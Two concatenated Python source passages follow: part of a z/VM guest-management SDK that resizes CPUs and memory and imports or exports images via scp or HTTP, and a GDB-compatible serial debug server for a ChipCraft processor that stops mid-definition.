namelist_query(self, namelist): rd = "SMAPI %s API Name_List_Query" % namelist resp = self._request_with_error_ignored(rd) if resp is not None: return resp['response'] else: return [] def namelist_destroy(self, namelist): rd = "SMAPI %s API Name_List_Destroy" % namelist self._request_with_error_ignored(rd) def _get_defined_cpu_addrs(self, userid): user_direct = self.get_user_direct(userid) defined_addrs = [] max_cpus = 0 for ent in user_direct: if ent.startswith("CPU"): cpu_addr = ent.split()[1].strip().upper() defined_addrs.append(cpu_addr) if ent.startswith("MACHINE ESA"): max_cpus = int(ent.split()[2].strip()) return (max_cpus, defined_addrs) def _get_available_cpu_addrs(self, used_addrs, max_cpus): # Get available CPU addresses that are not defined in user entry used_set = set(used_addrs) available_addrs = set([hex(i)[2:].rjust(2, '0').upper() for i in range(0, max_cpus)]) available_addrs.difference_update(used_set) return list(available_addrs) def _get_active_cpu_addrs(self, userid): # Get the active cpu addrs in two-digit hex string in upper case # Sample output for 'lscpu --parse=ADDRESS': # # The following is the parsable format, which can be fed to other # # programs. Each different item in every column has an unique ID # # starting from zero. # # Address # 0 # 1 active_addrs = [] active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS") for c in active_cpus: # Skip the comment lines at beginning if c.startswith("# "): continue addr = hex(int(c.strip()))[2:].rjust(2, '0').upper() active_addrs.append(addr) return active_addrs def resize_cpus(self, userid, count): # Check defined cpus in user entry. If greater than requested, then # delete cpus. Otherwise, add new cpus. # Return value: for revert usage, a tuple of # action: The action taken for this resize, possible values: # 0: no action, 1: add cpu, 2: delete cpu # cpu_addrs: list of influenced cpu addrs action = 0 updated_addrs = [] (max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid) defined_count = len(defined_addrs) # Check maximum cpu count defined if max_cpus == 0: LOG.error("Resize for guest '%s' cann't be done. The maximum " "number of cpus is not defined in user directory." % userid) raise exception.SDKConflictError(modID='guest', rs=3, userid=userid) # Check requested count is less than the maximum cpus if count > max_cpus: LOG.error("Resize for guest '%s' cann't be done. The " "requested number of cpus: '%i' exceeds the maximum " "number of cpus allowed: '%i'." % (userid, count, max_cpus)) raise exception.SDKConflictError(modID='guest', rs=4, userid=userid, req=count, max=max_cpus) # Check count and take action if defined_count == count: LOG.info("The number of current defined CPUs in user '%s' equals " "to requested count: %i, no action for static resize" "needed." % (userid, count)) return (action, updated_addrs, max_cpus) elif defined_count < count: action = 1 # add more CPUs available_addrs = self._get_available_cpu_addrs(defined_addrs, max_cpus) # sort the list and get the first few addrs to use available_addrs.sort() # Define new cpus in user directory rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid, "--operands")) updated_addrs = available_addrs[0:count - defined_count] for addr in updated_addrs: rd += (" -k CPU=CPUADDR=%s" % addr) try: self._request(rd) except exception.SDKSMTRequestFailed as e: msg = ("Define new cpus in user directory for '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise exception.SDKGuestOperationError(rs=6, userid=userid, err=e.format_message()) LOG.info("New CPUs defined in user directory for '%s' " "successfully" % userid) return (action, updated_addrs, max_cpus) else: action = 2 # Delete CPUs defined_addrs.sort() updated_addrs = defined_addrs[-(defined_count - count):] # Delete the last few cpus in user directory rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid, "--operands")) for addr in updated_addrs: rd += (" -k CPU=CPUADDR=%s" % addr) try: self._request(rd) except exception.SDKSMTRequestFailed as e: msg = ("Delete CPUs in user directory for '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise exception.SDKGuestOperationError(rs=6, userid=userid, err=e.format_message()) LOG.info("CPUs '%s' deleted from user directory for '%s' " "successfully" % (str(updated_addrs), userid)) return (action, updated_addrs, max_cpus) def live_resize_cpus(self, userid, count): # Get active cpu count and compare with requested count # If request count is smaller than the current count, then report # error and exit immediately. active_addrs = self._get_active_cpu_addrs(userid) active_count = len(active_addrs) if active_count > count: LOG.error("Failed to live resize cpus of guest: %(uid)s, " "current active cpu count: %(cur)i is greater than " "the requested count: %(req)i." % {'uid': userid, 'cur': active_count, 'req': count}) raise exception.SDKConflictError(modID='guest', rs=2, userid=userid, active=active_count, req=count) # Static resize CPUs. (add or delete CPUs from user directory) (action, updated_addrs, max_cpus) = self.resize_cpus(userid, count) if active_count == count: # active count equals to requested LOG.info("Current active cpu count of guest: '%s' equals to the " "requested count: '%i', no more actions needed for " "live resize." % (userid, count)) LOG.info("Live resize cpus for guest: '%s' finished successfully." % userid) return else: # Get the number of cpus to add to active and check address active_free = self._get_available_cpu_addrs(active_addrs, max_cpus) active_free.sort() active_new = active_free[0:count - active_count] # Do live resize # Define new cpus cmd_str = "vmcp def cpu " + ' '.join(active_new) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as err1: # rollback and return msg1 = ("Define cpu of guest: '%s' to active failed with . " "error: %s." % (userid, err1.format_message())) # Start to do rollback if action == 0: LOG.error(msg1) else: LOG.error(msg1 + (" Will revert the user directory " "change.")) # Combine influenced cpu addrs cpu_entries = "" for addr in updated_addrs: cpu_entries += (" -k CPU=CPUADDR=%s" % addr) rd = '' if action == 1: # Delete added CPUs rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM" % userid, " --operands")) else: # Add deleted CPUs rd = ''.join(("SMAPI %s API Image_Definition_Create_DM" % userid, " --operands")) rd += cpu_entries try: self._request(rd) except exception.SDKSMTRequestFailed as err2: msg = ("Failed to revert user directory change for '" "%s', SMT error: %s" % (userid, err2.format_message())) LOG.error(msg) else: LOG.info("Revert user directory change for '%s' " "successfully." % userid) # Finally raise the exception raise exception.SDKGuestOperationError( rs=7, userid=userid, err=err1.format_message()) # Activate successfully, rescan in Linux layer to hot-plug new cpus LOG.info("Added new CPUs to active configuration of guest '%s'" % userid) try: self.execute_cmd(userid, "chcpu -r") except exception.SDKSMTRequestFailed as err: msg = err.format_message() LOG.error("Rescan cpus to hot-plug new defined cpus for guest: " "'%s' failed with error: %s. No rollback is done and you" "may need to check the status and restart the guest to " "make the defined cpus online." % (userid, msg)) raise exception.SDKGuestOperationError(rs=8, userid=userid, err=msg) LOG.info("Live resize cpus for guest: '%s' finished successfully." % userid) def _get_defined_memory(self, userid): user_direct = self.get_user_direct(userid) defined_mem = max_mem = reserved_mem = -1 for ent in user_direct: # u'USER userid password storage max privclass' if ent.startswith("USER "): fields = ent.split(' ') if len(fields) != 6: # This case should not exist if the target user # is created by zcc and not updated manually by user break defined_mem = int(zvmutils.convert_to_mb(fields[3])) max_mem = int(zvmutils.convert_to_mb(fields[4])) # For legacy guests, the reserved memory may not be defined if ent.startswith("COMMAND DEF STOR RESERVED"): reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4])) return (defined_mem, max_mem, reserved_mem, user_direct) def _replace_user_direct(self, userid, user_entry): # user_entry can be a list or a string entry_str = "" if isinstance(user_entry, list): for ent in user_entry: if ent == "": # skip empty line continue else: entry_str += (ent + '\n') else: entry_str = user_entry tmp_folder = tempfile.mkdtemp() tmp_user_direct = os.path.join(tmp_folder, userid) with open(tmp_user_direct, 'w') as f: f.write(entry_str) rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid, "--operands ", "-f %s" % tmp_user_direct)) try: self._request(rd) except exception.SDKSMTRequestFailed as err1: msg = ("Replace definition of guest '%s' failed with " "SMT error: %s." % (userid, err1.format_message())) LOG.error(msg) LOG.debug("Unlocking the user directory.") rd = ("SMAPI %s API Image_Unlock_DM " % userid) try: self._request(rd) except exception.SDKSMTRequestFailed as err2: # ignore 'not locked' error if ((err2.results['rc'] == 400) and ( err2.results['rs'] == 24)): LOG.debug("Guest '%s' unlocked successfully." % userid) pass else: # just print error and ignore this unlock error msg = ("Unlock definition of guest '%s' failed " "with SMT error: %s" % (userid, err2.format_message())) LOG.error(msg) else: LOG.debug("Guest '%s' unlocked successfully." % userid) # at the end, raise the replace error for upper layer to handle raise err1 finally: self._pathutils.clean_temp_folder(tmp_folder) def _lock_user_direct(self, userid): rd = ("SMAPI %s API Image_Lock_DM " % userid) try: self._request(rd) except exception.SDKSMTRequestFailed as e: # ignore the "already locked" error if ((e.results['rc'] == 400) and (e.results['rs'] == 12)): LOG.debug("Image is already unlocked.") else: msg = ("Lock definition of guest '%s' failed with" " SMT error: %s" % (userid, e.format_message())) LOG.error(msg) raise e def resize_memory(self, userid, memory): # Check defined storage in user entry. # Update STORAGE and RESERVED accordingly. size = int(zvmutils.convert_to_mb(memory)) (defined_mem, max_mem, reserved_mem, user_direct) = self._get_defined_memory(userid) # Check max memory is properly defined if max_mem == -1 or reserved_mem == -1: LOG.error("Memory resize for guest '%s' cann't be done." "Failed to get the defined/max/reserved memory size " "from user directory." % userid) raise exception.SDKConflictError(modID='guest', rs=19, userid=userid) action = 0 # Make sure requested size is less than the maximum memory size if size > max_mem: LOG.error("Memory resize for guest '%s' cann't be done. The " "requested memory size: '%im' exceeds the maximum " "size allowed: '%im'." % (userid, size, max_mem)) raise exception.SDKConflictError(modID='guest', rs=20, userid=userid, req=size, max=max_mem) # check if already satisfy request if defined_mem == size: LOG.info("The current defined memory size in user '%s' equals " "to requested size: %im, no action for memory resize " "needed." % (userid, size)) return (action, defined_mem, max_mem, user_direct) else: # set action to 1 to represent that revert need to be done when # live resize failed. action = 1 # get the new reserved memory size new_reserved = max_mem - size # prepare the new user entry content entry_str = "" for ent in user_direct: if ent == '': # Avoid adding an empty line in the entry file # otherwise Image_Replace_DM would return syntax error. continue new_ent = "" if ent.startswith("USER "): fields = ent.split(' ') for i in range(len(fields)): # update fields[3] to new defined size if i != 3: new_ent += (fields[i] + ' ') else: new_ent += (str(size) + 'M ') # remove the last space new_ent = new_ent.strip() elif ent.startswith("COMMAND DEF STOR RESERVED"): new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved) else: new_ent = ent # append this new entry entry_str += (new_ent + '\n') # Lock and replace user definition with the new_entry content try: self._lock_user_direct(userid) except exception.SDKSMTRequestFailed as e: raise exception.SDKGuestOperationError(rs=9, userid=userid, err=e.format_message()) LOG.debug("User directory Locked successfully for guest '%s' " % userid) # Replace user directory try: self._replace_user_direct(userid, entry_str) except exception.SDKSMTRequestFailed as e: raise exception.SDKGuestOperationError(rs=10, userid=userid, err=e.format_message()) # Finally return useful info return (action, defined_mem, max_mem, user_direct) def _revert_user_direct(self, userid, user_entry): # user_entry can be a list or a string try: self._lock_user_direct(userid) except exception.SDKSMTRequestFailed: # print revert error and return msg = ("Failed to revert user direct of guest '%s'." % userid) LOG.error(msg) return LOG.debug("User directory Locked successfully for guest '%s'." % userid) # Replace user directory try: self._replace_user_direct(userid, user_entry) except exception.SDKSMTRequestFailed: msg = ("Failed to revert user direct of guest '%s'." % userid) LOG.error(msg) return LOG.debug("User directory reverted successfully for guest '%s'." % userid) def _get_active_memory(self, userid): # Return an integer value representing the active memory size in mb output = self.execute_cmd(userid, "lsmem") # cmd output contains following line: # Total online memory : 8192 MB active_mem = 0 for e in output: if e.startswith("Total online memory : "): try: mem_info = e.split(' : ')[1].split(' ') # sample mem_info: [u'2048', u'MB'] active_mem = int(zvmutils.convert_to_mb(mem_info[0] + mem_info[1][0])) except (IndexError, ValueError, KeyError, TypeError): errmsg = ("Failed to get active storage size for guest: %s" % userid) LOG.error(errmsg) raise exception.SDKInternalError(msg=errmsg) break return active_mem def live_resize_memory(self, userid, memory): # Get active memory size and compare with requested size # If request size is smaller than the current size, then report # error and exit immediately. size = int(zvmutils.convert_to_mb(memory)) active_size = self._get_active_memory(userid) if active_size > size: LOG.error("Failed to live resize memory of guest: %(uid)s, " "current active memory size: %(cur)im is greater than " "the requested size: %(req)im." % {'uid': userid, 'cur': active_size, 'req': size}) raise exception.SDKConflictError(modID='guest', rs=18, userid=userid, active=active_size, req=size) # Static resize memory. (increase/decrease memory from user directory) (action, defined_mem, max_mem, user_direct) = self.resize_memory(userid, memory) # Compare active size and requested size, then update accordingly if active_size == size: # online memory already satisfied LOG.info("Current active memory size of guest: '%s' equals to the " "requested size: '%iM', no more actions needed for " "live resize." % (userid, size)) LOG.info("Live resize memory for guest: '%s' finished " "successfully." % userid) return else: # Do live resize. update memory size increase_size = size - active_size # Step1: Define new standby storage cmd_str = ("vmcp def storage standby %sM" % increase_size) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as e: # rollback and return msg = ("Define standby memory of guest: '%s' failed with " "error: %s." % (userid, e.format_message())) LOG.error(msg) # Start to do rollback if action == 1: LOG.debug("Start to revert user definition of guest '%s'." % userid) self._revert_user_direct(userid, user_direct) # Finally, raise the error and exit raise exception.SDKGuestOperationError(rs=11, userid=userid, err=e.format_message()) # Step 2: Online new memory cmd_str = ("chmem -e %sM" % increase_size) try: self.execute_cmd(userid, cmd_str) except exception.SDKSMTRequestFailed as err1: # rollback and return msg1 = ("Online memory of guest: '%s' failed with " "error: %s." % (userid, err1.format_message())) LOG.error(msg1) # Start to do rollback LOG.info("Start to do revert.") LOG.debug("Reverting the standby memory.") try: self.execute_cmd(userid, "vmcp def storage standby 0M") except exception.SDKSMTRequestFailed as err2: # print revert error info and continue msg2 = ("Revert standby memory of guest: '%s' failed with " "error: %s." % (userid, err2.format_message())) LOG.error(msg2) # Continue to do the user directory change. if action == 1: LOG.debug("Reverting the user directory change of guest " "'%s'." % userid) self._revert_user_direct(userid, user_direct) # Finally raise the exception raise exception.SDKGuestOperationError( rs=7, userid=userid, err=err1.format_message()) LOG.info("Live resize memory for guest: '%s' finished successfully." % userid) class FilesystemBackend(object): @classmethod def image_import(cls, image_name, url, target, **kwargs): """Import image from remote host to local image repository using scp. If remote_host not specified, it means the source file exist in local file system, just copy the image to image repository """ source = urlparse.urlparse(url).path if kwargs['remote_host']: if '@' in kwargs['remote_host']: source_path = ':'.join([kwargs['remote_host'], source]) command = ' '.join(['/usr/bin/scp', "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", '-r ', source_path, target]) (rc, output) = zvmutils.execute(command) if rc: msg = ("Copying image file from remote filesystem failed" " with reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=10, err=output) else: msg = ("The specified remote_host %s format invalid" % kwargs['remote_host']) LOG.error(msg) raise exception.SDKImageOperationError(rs=11, rh=kwargs['remote_host']) else: LOG.debug("Remote_host not specified, will copy from local") try: shutil.copyfile(source, target) except Exception as err: msg = ("Import image from local file system failed" " with reason %s" % six.text_type(err)) LOG.error(msg) raise exception.SDKImageOperationError(rs=12, err=six.text_type(err)) @classmethod def image_export(cls, source_path, dest_url, **kwargs): """Export the specific image to remote host or local file system """ dest_path = urlparse.urlparse(dest_url).path if kwargs['remote_host']: target_path = ':'.join([kwargs['remote_host'], dest_path]) command = ' '.join(['/usr/bin/scp', "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", '-r ', source_path, target_path]) (rc, output) = zvmutils.execute(command) if rc: msg = ("Error happened when copying image file to remote " "host with reason: %s" % output) LOG.error(msg) raise exception.SDKImageOperationError(rs=21, msg=output) else: # Copy to local file system LOG.debug("Remote_host not specified, will copy to local server") try: shutil.copyfile(source_path, dest_path) except Exception as err: msg = ("Export image from %(src)s to local file system" " %(dest)s failed: %(err)s" % {'src': source_path, 'dest': dest_path, 'err': six.text_type(err)}) LOG.error(msg) raise exception.SDKImageOperationError(rs=22, err=six.text_type(err)) class HTTPBackend(object): @classmethod def image_import(cls, image_name, url, target, **kwargs): import_image = MultiThreadDownloader(image_name, url, target) import_image.run() class MultiThreadDownloader(threading.Thread): def __init__(self, image_name, url, target): super(MultiThreadDownloader, self).__init__() self.url = url # Set thread number self.threadnum = 8 r = requests.head(self.url) # Get the size of the download resource self.totalsize = int(r.headers['Content-Length']) self.target = target def handle_download_errors(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception as err: self.fd.close() msg = ("Download image from http server failed: %s" % six.text_type(err)) LOG.error(msg) raise exception.SDKImageOperationError(rs=9, err=six.text_type(err)) return wrapper def get_range(self): ranges = [] offset = int(self.totalsize / self.threadnum) for i in range(self.threadnum): if i == self.threadnum - 1: ranges.append((i * offset, '')) else: # Get the process range for each thread ranges.append((i * offset, (i + 1) * offset)) return ranges def download(self, start, end): headers = {'Range': 'Bytes=%s-%s' % (start, end), 'Accept-Encoding': '*'} # Get the data res = requests.get(self.url, headers=headers) # seek to the right position for writing data LOG.debug("Downloading file range %s:%s success" % (start, end)) with _LOCK: self.fd.seek(start) self.fd.write(res.content) @handle_download_errors def run(self): self.fd = open(self.target, 'w') thread_list = [] n = 0 for ran in self.get_range(): start, end = ran LOG.debug('thread %d start:%s,end:%s' % (n, start, end)) n += 1 # Open thread thread = threading.Thread(target=self.download, args=(start, end)) thread.start() thread_list.append(thread) for i in thread_list: i.join() LOG.info('Download %s success' % (self.name)) self.fd.close()
dbgserver.py
#!/usr/bin/env python2 # # Copyright (c) 2017 ChipCraft Sp. z o.o. # # GDB compatible Debug Server for CC Processor # # Author: Rafal Harabien # # $Date: 2020-04-14 16:02:50 +0200 (wto, 14 kwi 2020) $ # $Revision: 547 $ # import time, sys, os, stat, select, threading, logging, re, struct, binascii, socket, serial, getopt, signal is_py2 = sys.version[0] == '2' if is_py2: import Queue as queue else: import queue as queue # Default options GDB_PORT = 3333 DBG_PORT = '/dev/ttyUSB1' DBG_BAUDRATE = 460800 # Constants DEBUG_BREAKPOINTS = 0x90000000 DEBUG_WATCHPOINTS = 0x90000010 DEBUG_BURST_COUNT = 0x90000020 DEBUG_REGS = 0x91000000 MAX_BURST_LEN = 0xFFC BREAKPOINTS_NUM = 4 WATCHPOINTS_NUM = 4 ACK_CHR = b'\6' SIGINT = 2 SIGTRAP = 5 BREAK_OPCODE = b'\x00\x00\x03\xCD' MEM_REGION_ALIGNMENT = 0x10000 class DebuggerDisconnectedException(Exception): """Raised when GDB debugger disconnects from debug server.""" pass class DebuggerInterruptedException(Exception): """Raised when GDB debugger sends interrupt byte (0x03) to stop program execution.""" pass class TargetDisconnectedException(Exception): """Raised when target hardware is disconnected.""" pass class GdbConn: """Represents connection with GDB client. Uses socket for communication. Supports sending and parsing packets in GDB Remote Protocol.""" def __init__(self, sock, cpu_input_thread): self._sock = sock self._buf = b'' self._buf_offset = 0 self._packet_queue = queue.Queue() self._cpu_input_thread = cpu_input_thread self._no_ack_mode = False self._input_thread = threading.Thread(target=self._input_thread_proc, name='GDB Input') self._input_thread.daemon = True self._input_thread.start() def get_packet(self, timeout=None): while True: data = self._get_from_queue(timeout) if data not in [b'+', b'-']: return data logging.warn('Expected GDB packet, got ACK (%s)', data) def _get_from_queue(self, timeout=None): if not self._packet_queue: # Got EOF before logging.debug('Got EOF from GDB before') return None try: data = self._packet_queue.get(timeout != 0, timeout) if not data: logging.debug('Got EOF from GDB') self._packet_queue = None self._input_thread = None return data except queue.Empty: logging.debug('Timeout when reading GDB input queue (%s)', timeout) return None def send_packet(self, data): packet = self._prepare_packet(data) while True: logging.debug('Sending GDB packet: %s', packet) self._write(packet) if self._no_ack_mode: return True ack = self._get_from_queue(timeout=5) if not ack: logging.warning('Failed to read ACK from GDB') return False elif ack == b'+': logging.debug('Received ACK from GDB') return True else: logging.warning('Expected ACK from GDB, got \'%s\' (%s) (packet %s)', ack, binascii.hexlify(ack), packet) def _input_thread_proc(self): try: while True: data = self._read_packet() if data == b'\3': self._cpu_input_thread.put_interrupt() else: self._packet_queue.put(data) if not data: self._cpu_input_thread.put_exit_flag() if not data or data == b'D': logging.debug('Ending GDB input thread') self._packet_queue = None break except: logging.exception('Uncaught exception') def _read_byte(self): if self._buf_offset == len(self._buf): self._buf = self._read() self._buf_offset = 0 if self._buf: self._buf_offset = self._buf_offset + 1 return self._buf[self._buf_offset - 1:self._buf_offset] def _read_packet(self): in_packet = False while True: ch = self._read_byte() if not ch: # EOF logging.debug('Got EOF from GDB in _read_packet') return None if ch == b'$': data = b'' checksum = 0 in_packet = True elif not in_packet: if ch in [b'\3', b'+', b'-']: # Interrupt, ACK, NACK logging.debug('Got special byte %s from GDB', ch) return ch else: logging.warn('Ignoring non-packet byte %s', ch) elif ch == b'#': ch1 = self._read_byte() ch2 = self._read_byte() if not ch1 or not ch2: logging.error('Failed to read packet checksum') return None xmitcsum = int(ch1 + ch2, 16) checksum = checksum % 256 if checksum == xmitcsum: break # success else: logging.warning('Invalid checksum (0x%X != 0x%X)', checksum, xmitcsum) self._write(b'-') in_packet = False else: data = data + ch checksum += ord(ch) # send ACK if not self._no_ack_mode: self._write(b'+') # unescape binary data and return escape_pattern = re.compile(b'\x7D(.)', flags=re.DOTALL) data = escape_pattern.sub(lambda m: bytes(bytearray((ord(m.group(1)) ^ 0x20,))), data) return data def _prepare_packet(self, data): checksum = 0 for b in data: checksum += ord(b) if is_py2 else b checksum = checksum % 256 return b'$' + data + b'#' + ('%02X' % checksum).encode('ascii') def _read(self): if self._sock: return self._sock.recv(1024) elif hasattr(sys.stdin, 'buffer'): return sys.stdin.buffer.read(1) else: return sys.stdin.read(1) def _write(self, data): if self._sock: self._sock.send(data) elif hasattr(sys.stdout, 'buffer'): sys.stdout.buffer.write(data) sys.stdout.flush() else: sys.stdout.write(data) sys.stdout.flush() def start_no_ack_mode(self): self._no_ack_mode = True class StreamLoggingWrapper: """Serial Port proxy with logging support.""" def __init__(self, inner, log_path=None): self._inner = inner self._log_path = log_path self._log_file = None if self._log_path: self._log_file = open(self._log_path, 'wb') def write(self, data): if logging.getLogger().isEnabledFor(logging.DEBUG): # dont hexlify if not needed logging.debug('Serial Write: %s %s', binascii.hexlify(data).decode('ascii'), binascii.b2a_qp(data)) if self._log_file: self._log_file.write(data + b'\n') return self._inner.write(data) def read(self, size=1): data = self._inner.read(size) if logging.getLogger().isEnabledFor(logging.DEBUG): # dont hexlify if not needed logging.debug('Serial Read: %s %s', binascii.hexlify(data).decode('ascii'), binascii.b2a_qp(data)) return data def close(self): self._inner.close() if self._log_file: self._log_file.close() self._log_file = None class CpuInputThread(threading.Thread): def __init__(self, serial): threading.Thread.__init__(self) self._serial = serial self._queue = queue.Queue() self.closing = False self._debugger_disconnected_flag = False self._interrupted_flag = False self._target_disconnected_flag = False def run(self): try: while True: if self.closing: logging.debug('Close request in CpuInputThread - exiting') break try: data = self._serial.read() except serial.SerialException as e: if not self.closing: logging.error('Serial exception: %s', e) else: logging.debug('Ending CPU input thread after port close') break if data: self._queue.put(data) else: logging.debug('Ending CPU input thread - read returned 0') break self._target_disconnected_flag = True self._queue.put('') except: logging.exception('Uncaught exception') def get_byte(self, timeout=None, interruptible=False): try: if interruptible: self._check_flags() data = self._queue.get(timeout != 0, timeout) if not data and interruptible: self._check_flags() return data except queue.Empty: logging.debug('Timeout when reading CPU queue (%s)', timeout) return None def put_interrupt(self): logging.debug('Adding interrupt flag to CPU queue') self._interrupted_flag = True self._queue.put('') def put_exit_flag(self): logging.debug('Adding exit flag to CPU queue') self._debugger_disconnected_flag = True self._queue.put('') def _check_flags(self): if self._debugger_disconnected_flag: self._debugger_disconnected_flag = False raise DebuggerDisconnectedException() if self._interrupted_flag: self._interrupted_flag = False raise DebuggerInterruptedException() if self._target_disconnected_flag: self._target_disconnected_flag = False raise TargetDisconnectedException() class CpuDebug: """Communication with Processor Debugger through Serial Port.""" def __init__(self, serial, mcu_name=None): self._serial = serial #self._serial.close() self._cur_addr = None self._auto_inc = None self._core_ctx = {} self._core_id = None self._cores_num = None self._mcu_name = mcu_name self._input_thread = None self._burst_len = 0 self._burst_started = False self._create_input_thread() def get_input_thread(self): return self._input_thread def _create_input_thread(self): self._input_thread = CpuInputThread(self._serial) self._input_thread.name = 'CPU Input' self._input_thread.daemon = True self._input_thread.start() def _read(self, size=1, timeout=5, interruptible=False): result = b'' for i in range(0, size): byte = self._input_thread and self._input_thread.get_byte(timeout, interruptible) if byte == b'': logging.debug('Got interrupt from CPU input queue') if i == 0 and interruptible: return b'' else: logging.warn('Ignoring unexpected interrupt from CPU input queue') byte = self._input_thread and self._input_thread.get_byte(timeout, interruptible) if byte == b'': logging.warn('Got second unexpected interrupt from CPU input queue') result += byte or b'' logging.debug('Read from CPU input queue: %s %s', binascii.hexlify(result).decode('ascii'), binascii.b2a_qp(result)) return result def _write(self, data): self._serial.write(data) def expect_ack(self): ack = self._read() if ack != ACK_CHR: logging.warning('Expected ACK from CPU, got \'%s\' (0x%X)', binascii.b2a_qp(ack), ord(ack or b'\0')) return False return True def set_addr(self, addr): if addr == self._cur_addr: # already there logging.debug('set_addr optimized out') return True assert addr % 4 == 0 self._write(b'a' + struct.pack('>I', addr)) success = self.expect_ack() if success: self._cur_addr = addr else: self._cur_addr = None return success def _inc_addr_after_rw(self): if self._auto_inc: self._cur_addr += 4 elif self._auto_inc is None: self._cur_addr = None def read_mem_word(self): if not self._burst_started: self._write(b'm') if self._burst_len > 0: self._burst_started = True if self._burst_len > 0: self._burst_len -= 4 if self._burst_len == 0: self._burst_started = False logging.debug('Burst finished') res = self._read(4) if len(res) != 4: logging.warning('read_mem failed') self._cur_addr = None return None self._inc_addr_after_rw() return res def write_mem_word(self, word): assert len(word) == 4 if not self._burst_started: self._write(b'w') if self._burst_len > 0: self._burst_started = True self._write(word) if self._burst_len > 0: self._burst_len -= 4 if self._burst_len == 0: self._burst_started = False logging.debug('Burst finished') if self._burst_len == 0: success = self.expect_ack() if not success: logging.warning('write_mem failed') self._cur_addr = None return False self._inc_addr_after_rw() return True def _read_mem_aligned(self, addr, length): if length > 4 and not self.set_auto_inc(True): return None data = b'' for offset in range(0, length, 4): self._setup_burst_mode(addr + offset, length - offset) if not self.set_addr(addr + offset): return None word = self.read_mem_word() if not word: return None data += word return data def read_mem(self, addr, length): start_misalignment = addr % 4 start_aligned = addr - start_misalignment end_misalignment = (addr + length) % 4 end_aligned = (addr + length) + (4 - end_misalignment) % 4 data = self._read_mem_aligned(start_aligned, end_aligned - start_aligned) if data: data = data[start_misalignment:] data = data[:length] return data def _write_mem_aligned(self, addr, data): if len(data) > 4 and not self.set_auto_inc(True): return False for offset in range(0, len(data), 4): self._setup_burst_mode(addr + offset, len(data) - offset) if not self.set_addr(addr + offset): return False if not self.write_mem_word(data[offset:offset+4]): return False return True def write_mem(self, addr, data): # Fix start address misalignment start_misalign = addr % 4 start_word = None addr -= start_misalign if not self.set_addr(addr): return False if start_misalign != 0: if not self.set_auto_inc(False): return False start_word = self.read_mem_word() if not start_word: return False data = start_word[:start_misalign] + data # Aligned write assert addr % 4 == 0 end_misalign = len(data) % 4 aligned_len = len(data) - end_misalign if not self._write_mem_aligned(addr, data[:aligned_len]): return False # Fix end address misalignment if end_misalign != 0: end_word_addr = addr + len(data) - end_misalign assert end_word_addr % 4 == 0 if not self.set_addr(end_word_addr): return False if end_word_addr != addr or not start_word: if not self.set_auto_inc(False): return False end_word = self.read_mem_word() if not end_word: return False if not self.set_auto_inc(True): return False else: end_word = start_word data += end_word[end_misalign:] new_end_word = data[aligned_len:] assert len(new_end_word) == 4 if not self.write_mem_word(new_end_word): return False return True def set_auto_inc(self, enabled): if enabled == self._auto_inc: # this autoinc mode is already selected - skip return True if enabled: self._write(b'I') else: self._write(b'i') got_ack = self.expect_ack() if got_ack: self._auto_inc = enabled else: self._auto_inc = None return got_ack def set_core(self, core_id): if core_id == self._core_id: # this core is already selected - skip return True self._write(struct.pack('>B', 160+core_id)) got_ack = self.expect_ack() if got_ack: self._core_id = core_id else: self._core_id = None return got_ack def get_core(self): return self._core_id def free_run(self): self._write(b'f') return self.expect_ack() def step(self): self._write(b's') def break_cpu(self): self._write(b'b') def reset_cpu(self): #self.write_mem(0x30030028, '\0\0\0\1') # remap self._write(b'r') return self.expect_ack() def reset_debugger(self): self._write(b'R') return self.expect_ack() def read_reg(self, idx): return self.read_mem(DEBUG_REGS + idx*4, 4) def read_regs(self): return self.read_mem(DEBUG_REGS, 32*4) def write_regs(self, data): return self.write_mem(DEBUG_REGS, data) def get_pc_reg(self): ctx = self._core_ctx[self._core_id] if ctx: return ctx['addr'] logging.error('PC address is unknown') return None def is_core_active(self, core_id): if core_id in self._core_ctx and self._core_ctx[core_id]: return True return False def get_active_cores(self): return [core_id for core_id in self._core_ctx if self._core_ctx[core_id]] def get_core_ctx(self, core_id): if core_id in self._core_ctx: return self._core_ctx[core_id] return None def set_breakpoint(self, idx, addr): addr_bin = struct.pack('>I', addr) return self.write_mem(DEBUG_BREAKPOINTS + idx*4, addr_bin) def get_breakpoint(self, idx): addr_bin = self.read_mem(DEBUG_BREAKPOINTS + idx*4, 4) if not addr_bin: return None addr, = struct.unpack('>I', addr_bin) return addr def set_watchpoint(self, idx, addr): addr_bin = struct.pack('>I', addr) return self.write_mem(DEBUG_WATCHPOINTS + idx*4, addr_bin) def get_watchpoint(self, idx): addr_bin = self.read_mem(DEBUG_WATCHPOINTS + idx*4, 4) if not addr_bin: return None addr, = struct.unpack('>I', addr_bin) return addr def _read_core_context(self): core_id_raw = self._read() core_id = ord(core_id_raw) is_working = (core_id & 0x80) == 0 core_id &= 0x7F if is_working: ctx = {} addr_bin = self._read(4) addr, = struct.unpack('>I', addr_bin) ctx['addr'] = addr instr = self._read(4) instr_str = binascii.hexlify(instr) ctx['instr'] = instr result, = struct.unpack('>I', self._read(4)) data, = struct.unpack('>I', self._read(4)) lsaddr, = struct.unpack('>I', self._read(4)) ldata, = struct.unpack('>I', self._read(4)) ctx['lsaddr'] = lsaddr if instr_str[0:4] == b'dead': logging.warning('Core %d is executing 16-bit instruction at 0x%X: %s', core_id, addr, instr_str[4:]) else: logging.info('Core %d is executing instruction at 0x%X: %s', core_id, addr, instr_str) logging.info(' result 0x%X data 0x%X lsaddr 0x%X ldata 0x%X', result, data, lsaddr, ldata) else: ctx = None logging.info('Core %d is halted', core_id) return core_id, ctx def 